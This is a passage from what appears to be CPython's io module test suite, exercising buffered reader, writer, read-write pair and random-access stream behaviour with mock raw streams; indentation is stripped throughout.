bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
@support.cpython_only
def test_buffer_freeing(self):
bufsize = 4096
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize)
size = sys.getsizeof(bufio) - bufsize
bufio.close()
self.assertEqual(sys.getsizeof(bufio), size)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
# Invalid args
self.assertRaises(ValueError, bufio.read1, -1)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
rawio = self.MockRawIO((b"abc", None))
bufio = self.tp(rawio)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"cb")
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent (a worked example follows this test)
self.assertEqual(rawio.read_history, raw_read_sizes)
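# Worked example for the bufsize=4 row above (an illustrative sketch over an
# in-memory stream; the commented raw-read pattern is the typical one but, as
# noted, mildly implementation-dependent).
def _demo_buffering_bufsize_4(self):
    raw = self.BytesIO(b"abcdefghi")
    bufio = self.tp(raw, buffer_size=4)
    self.assertEqual(bufio.read(1), b"a")     # raw read of 4 fills the buffer
    self.assertEqual(bufio.read(2), b"bc")    # served entirely from the buffer
    self.assertEqual(bufio.read(4), b"defg")  # one more raw read of 4
    self.assertEqual(bufio.read(2), b"hi")    # final raw read of the last byte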
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, "wb") as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
for t in threads:
t.start()
time.sleep(0.02) # yield
for t in threads:
t.join()
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
bufio.read(1)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
self.assertRaises(self.UnsupportedOperation, bufio.tell)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
def test_no_extraneous_read(self):
# Issue #9550: when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. on a socket).  A related caller-side sketch follows this test.
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
# _pyio.BufferedReader seems to implement reading differently, so
# checking this is not so easy.
self.assertRaises(OSError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
# The Python version has __del__, so it ends up in gc.garbage instead
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes; test that the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents, b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
# (a caller-side recovery sketch follows this test)
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
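# Caller-side sketch of the pattern exercised above: resuming a partial
# non-blocking write from BlockingIOError.characters_written.  The
# 'wait_until_writable' callback is hypothetical (e.g. a select()/poll()
# wait on the underlying file descriptor).
def _sketch_write_all_nonblocking(self, bufio, data, wait_until_writable):
    view = memoryview(data)
    while view:
        try:
            n = bufio.write(view)
        except BlockingIOError as e:
            # Part of the data may already have been accepted.
            n = e.characters_written
            wait_until_writable()
        view = view[n:]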
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
self.assertRaises(TypeError, bufio.writelines, 'abc')
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test that they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
for t in threads:
t.start()
time.sleep(0.02) # yield
for t in threads:
t.join()
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
self.assertRaises(OSError, bufio.write, b"abcdef")
def test_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise OSError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends up in gc.garbage instead
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.read, 0)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
def test_readinto(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = bytearray(5)
self.assertEqual(pair.readinto(data), 5)
self.assertEqual(data, b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
pair.write(b"def")
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if needed
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that the rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
# You can't construct a BufferedRandom over a non-seekable stream.
test_unseekable = None
class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
